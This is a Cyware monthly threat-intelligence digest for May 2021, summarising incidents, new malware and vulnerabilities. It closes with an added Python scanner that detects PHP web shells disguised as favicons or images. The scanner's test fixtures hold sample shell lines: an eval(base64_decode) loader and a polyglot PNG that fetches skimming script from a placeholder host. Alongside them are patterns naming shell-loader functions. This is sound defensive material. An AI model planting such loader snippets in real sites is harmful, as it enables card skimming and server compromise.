Cyware Monthly Threat Intelligence, May 2021

The Good

In the top news for the month, President Joe Biden signed an extensive executive order on improving the cybersecurity posture of the U.S. Meanwhile, top browser makers Google and Mozilla teamed up to develop an API to fend off XSS attacks. Advancing its own cyber defenses, the U.S. Coast Guard announced that it is establishing its first red team to take on cybersecurity threats.

  • The U.S. President signed an executive order to strengthen the country’s cybersecurity defenses. The order responds to the SolarWinds compromise and other significant attacks attributed to foreign threat actors.
  • Google, Mozilla, and the security firm Cure53 announced that they are developing an API that sanitizes HTML input strings to prevent cross-site scripting (XSS) attacks. The API will be integrated into future versions of Mozilla Firefox and Google Chrome.
  • A researcher from HSE University proposed a new algorithm for assessing the strength of encryption programs by brute-forcing the possible ways of deciphering symbols.
  • Microsoft released an open-source lab environment SimuLand that will help test and strengthen Microsoft 365 Defender, Azure Sentinel, and Azure Defender against real attack scenarios.
  • The U.S. Coast Guard announced the establishment of its first-ever red team under the Cyber Operational Assessments Branch to bolster its cyber defenses. It will transform its enterprise cyber blue team into a more comprehensive task force.
  • The U.K.’s NCSC rolled out a free cyber threat warning service, called Early Warning, that notifies organizations of possible incidents and security issues affecting them. It is the latest Active Cyber Defence service from the NCSC.

The Bad

Several global firms, from healthcare providers to audio equipment makers, including Fujitsu, Bose, and Toyota, had services disrupted by cyberattacks. Attacks on government agencies in Australia, Belgium, and Indonesia affected millions of citizens. Meanwhile, the new Iran-linked Agrius group launched destructive attacks against Israeli targets.

  • Fujitsu temporarily shut down its ProjectWEB SaaS platform after attackers used it to access data from multiple Japanese government entities, including the Ministry of Land, Infrastructure, Transport and Tourism; the Ministry of Foreign Affairs; the Cabinet Secretariat; and Narita Airport.
  • Microsoft disclosed that the Russia-based APT29 threat actor targeted around 150 government agencies, consultants, think tanks, and NGOs across at least 24 nations. The group behind the SolarWinds attack also compromised the United States Agency for International Development’s (USAID) account with the email marketing service Constant Contact to send its phishing emails.
  • Private patient info was released to media outlets by hackers who targeted hospitals in New Zealand’s Waikato district. The hackers gained unauthorized access to documents containing names, phone numbers, and addresses of patients and staff.
  • Two attacks hit Toyota subsidiaries: one against Daihatsu Diesel and another against Auto Parts Manufacturing Mississippi.
  • Bose Corporation suffered a data breach that occurred due to a ransomware attack in March. The personal information—social security numbers, compensation information, and other HR-related details—of some of its current and former employees was accessed by the attackers. 
  • A cryptocurrency scam that hit some members of Reddit’s WallStreetBets forum resulted in a loss of $2 million. Criminals reportedly misled people in a fake transaction on Telegram.
  • The Iranian hacking group Agrius deployed a new wiper, Apostle, that combines data-destruction and ransomware functionality. The group’s primary goals are cyberespionage and destruction; the ransom demand serves as cover, making the attacks look like ordinary ransomware.
  • The Avaddon ransomware gang threatened to release sensitive information, including passport images, driver’s licenses, and employment contracts, belonging to the NSW Labor Party of Australia after gaining access to its computer network in a major cyberattack. 
  • A database belonging to Bergen Logistics was left exposed online without authentication. It held 467,979 records containing names, addresses, order numbers, and email addresses related to shipments and customers.
  • A DDoS attack on Belgium’s government-run research network knocked more than 200 Belgian organizations offline. The affected entities include government bodies, parliament, universities, and research institutes.
  • An Iranian hacker group identified as N3tw0rm threatened to release 110GB of data belonging to H&M Israel. The group is suspected to be affiliated with the Iran-linked Pay2Key.
  • Indonesia’s government confirmed that the personal data of millions of citizens had leaked on the hacking forum RaidForums. The data was stolen from the national health insurance scheme Badan Penyelenggara Jaminan Sosial (BPJS).
  • Australian digital real estate business Domain Group fell victim to a phishing attack that targeted its users by asking them to pay a deposit to secure rental property on a website nominated by the scammer. 
  • Taxpayers in South Korea, Australia, and the U.S. are being targeted by a phishing campaign whose lures pose as accounting ledgers. The campaign is used to distribute RATs.

New Threats

New vulnerabilities, phishing techniques, and malware families kept undermining organizations’ defensive efforts. The FragAttacks flaws affect WiFi devices, while the new Snip3 loader drops multiple RAT families and features unusually evasive behavior. Unprotected backend databases used by multiple Android apps also exposed the data of more than 100 million users.

  • A set of 12 vulnerabilities, dubbed FragAttacks, was disclosed in WiFi devices: three are design flaws in the IEEE 802.11 standard itself and nine are implementation bugs in specific products. All of them require the attacker to be within radio range of the target.
  • Personal data—names, email addresses, dates of birth, chat messages, location, and payment details—of over 100 million Android users was exposed due to unprotected databases used by 23 apps. Some of the apps are Logo Maker, Astro Guru, and T’Leva.
  • A new and stealthy malware loader called Snip3 was part of an ongoing phishing campaign that targeted aerospace and travel organizations. The malware loader has been used to drop Revenge RAT, AsyncRAT, Agent Tesla, and NetWire RAT on compromised systems.
  • In a new technique, Magecart Group 12 was observed hiding PHP web shells, known as Smilodon or Megalodon, inside website favicon files. The web shells fetched JavaScript skimming code through server-side requests and injected it dynamically into online stores.
  • Researchers observed an updated version of Lemon Duck cryptomining botnet that targeted unpatched Microsoft Exchange servers and attempted to execute payloads for Cobalt Strike DNS beacons.
  • Three new malware, DOUBLEDRAG, DOUBLEDROP, and DOUBLEBACK, were associated with a massive cyberespionage campaign that targeted many organizations in the U.S. Launched via phishing emails, the attacks were carried out by a new uncategorized group - UNC2529.
  • A new cryptocurrency stealer variant, Panda Stealer, was found targeting individuals across the U.S., Australia, Japan, and Germany. It is being spread through a global spam campaign that leverages Discord channels. 
  • The new Buer malware loader variant was being propagated via phishing emails. Dubbed RustyBuer, the new strain is written in Rust language and is capable of delivering Cobalt Strike Beacon as a second-stage payload.
  • Researchers demonstrated a new attack technique, dubbed TBONE, that can enable attackers to hack Tesla and other cars remotely without any user interaction. It abuses two vulnerabilities affecting ConnMan, an internet connection manager for embedded devices.
  • Moriya, a previously unknown rootkit, was used by an unidentified threat actor to deploy passive backdoors on public-facing servers, allowing the attackers to intercept and inspect the victim’s network traffic. The rootkit is part of the TunnelSnake campaign.
  • The Royal Mail delivery firm, once again, came into the crosshairs of scammers aiming to evade security checks in a new phishing scam. The scam is initiated with recipients receiving SMS messages claiming that a parcel has been redirected to the local post office due to an unpaid shipping fee.
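The Magecart favicon web shell item above describes a shell disguised as an image file so that it survives casual inspection. As an added example, not code from Cyware or from the researchers who reported the technique, the following scanner walks a web root and flags image-named files that fail their format's magic-byte check, contain a PHP open tag, or call the functions such loader shells rely on. The web root, file names, and the skimmer URL are hypothetical, and the sample site is constructed inside the script so it runs offline.

```python
"""Detect PHP code hiding in files that claim to be favicons or images.

Added example (not Cyware's or any vendor's code). The web root layout,
file names and the skimmer URL below are hypothetical; the sample files
are constructed in build_sample_site() so the scan runs offline.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

IMAGE_EXTS = {".ico", ".png", ".gif", ".jpg", ".jpeg", ".svg", ".webp"}

# Leading bytes a genuine file of each type must start with (SVG is text, no magic).
MAGIC = {
    ".ico": b"\x00\x00\x01\x00",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".webp": b"RIFF",
}

# PHP open tags ("<?php" or the short echo tag "<?=") and the functions that
# loader-style shells typically use to decode or fetch a second stage.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
SUSPICIOUS = re.compile(
    rb"\b(eval|base64_decode|gzinflate|str_rot13|create_function|"
    rb"file_get_contents|curl_exec)\s*\(",
    re.IGNORECASE,
)


def inspect_file(path: Path) -> Optional[Dict[str, object]]:
    """Return a finding for `path` if it looks like PHP dressed up as an image.

    A file is reported only when PHP markers are present; a magic-byte
    mismatch alone is recorded as context, since a corrupt icon is not a shell.
    """
    ext = path.suffix.lower()
    if ext not in IMAGE_EXTS:
        return None
    data = path.read_bytes()
    reasons: List[str] = []
    expected = MAGIC.get(ext)
    if expected is not None and not data.startswith(expected):
        reasons.append("magic bytes do not match extension")
    has_tag = PHP_TAG.search(data) is not None
    if has_tag:
        reasons.append("contains PHP open tag")
    funcs = sorted({m.group(1).lower().decode() for m in SUSPICIOUS.finditer(data)})
    if funcs:
        reasons.append("calls " + ", ".join(funcs))
    if not has_tag and not funcs:
        return None
    return {"path": str(path), "reasons": reasons}


def scan_tree(root: Path) -> List[Dict[str, object]]:
    """Scan every file under `root`, returning findings sorted by path."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file():
            finding = inspect_file(path)
            if finding is not None:
                findings.append(finding)
    return findings


def build_sample_site(root: Path) -> None:
    """Write a constructed web root: one clean icon, one bare shell, one polyglot."""
    (root / "images").mkdir()
    (root / "assets").mkdir()
    # Genuine favicon: ICO header plus padding, no code.
    (root / "favicon.ico").write_bytes(MAGIC[".ico"] + b"\x01\x00" + b"\x00" * 32)
    # Shell simply renamed to favicon.ico (fails the magic check outright).
    (root / "images" / "favicon.ico").write_bytes(
        b"<?php eval(base64_decode('ZWNobyAxOw==')); ?>"
    )
    # Polyglot: valid PNG header, then PHP that PHP's include() would still execute.
    # The URL is a hypothetical placeholder, not a real skimmer host.
    (root / "assets" / "logo.png").write_bytes(
        MAGIC[".png"] + b"\x00" * 16
        + b"<?php $c=file_get_contents('https://example.invalid/skim.js'); echo $c; ?>"
    )
    # Ordinary PHP file: outside the scanner's scope by extension.
    (root / "index.php").write_bytes(b"<?php echo 'shop'; ?>")


def demo() -> List[tuple]:
    """Build the sample site in a temp dir and return (relative path, reasons) pairs."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_site(root)
        return [
            (Path(f["path"]).relative_to(root).as_posix(), f["reasons"])
            for f in scan_tree(root)
        ]


if __name__ == "__main__":
    for rel, why in demo():
        print(f"{rel}: {'; '.join(why)}")
```

The polyglot case is the one that matters: a file that opens with a valid image header passes a naive `file`-style check and renders as an image, yet `include` will happily execute the PHP embedded after the header, which is why the scanner looks for PHP markers anywhere in the file rather than trusting the first bytes.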


Posted on: June 01, 2021
